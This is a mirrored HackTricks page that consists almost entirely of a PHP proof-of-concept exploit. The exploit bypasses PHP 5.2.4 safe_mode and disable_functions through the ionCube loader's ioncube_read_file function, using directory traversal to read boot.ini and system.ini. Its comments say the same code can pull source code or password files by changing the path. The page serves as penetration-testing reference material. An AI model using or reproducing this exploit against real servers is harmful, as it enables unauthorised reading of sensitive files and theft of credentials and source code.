mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-06 10:18:55 +00:00
43 lines
1.3 KiB
Markdown
43 lines
1.3 KiB
Markdown
|
# disable\_functions - PHP 5.2.4 ionCube extension Exploit
|
||
|
|
|
||
|
|
## PHP 5.2.4 ionCube extension Exploit
|
||
|
|
|
||
|
|
```php
|
||
|
|
<?php
|
||
|
|
//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass
|
||
|
|
|
||
|
|
//author: shinnai
|
||
|
|
//mail: shinnai[at]autistici[dot]org
|
||
|
|
//site: http://shinnai.altervista.org
|
||
|
|
|
||
|
|
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
|
||
|
|
|
||
|
|
//Technical details:
|
||
|
|
//ionCube version: 6.5
|
||
|
|
//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
|
||
|
|
//url: www.ioncube.com
|
||
|
|
|
||
|
|
//php.ini settings:
|
||
|
|
//safe_mode = On
|
||
|
|
//disable_functions = ioncube_read_file, readfile
|
||
|
|
|
||
|
|
//Description:
|
||
|
|
//This is useful to obtain juicy informations but also to retrieve source
|
||
|
|
//code of php pages, password files, etc... you just need to change file path.
|
||
|
|
//Anyway, don't worry, nobody will read your obfuscated code :)
|
||
|
|
|
||
|
|
//greetz to: BlackLight for help me to understand better PHP
|
||
|
|
|
||
|
|
//P.S.
|
||
|
|
//This extension contains even an interesting ioncube_write_file function...
|
||
|
|
if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
|
||
|
|
$path = str_repeat("..\\", 20);
|
||
|
|
$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :)
|
||
|
|
$MyBoot_ioncube = ioncube_read_file($path."boot.ini");
|
||
|
|
echo $MyBoot_readfile;
|
||
|
|
echo "<br><br>ionCube output:<br><br>";
|
||
|
|
echo $MyBoot_ioncube;
|
||
|
|
?>
|
||
|
|
```
|
||
|
|
|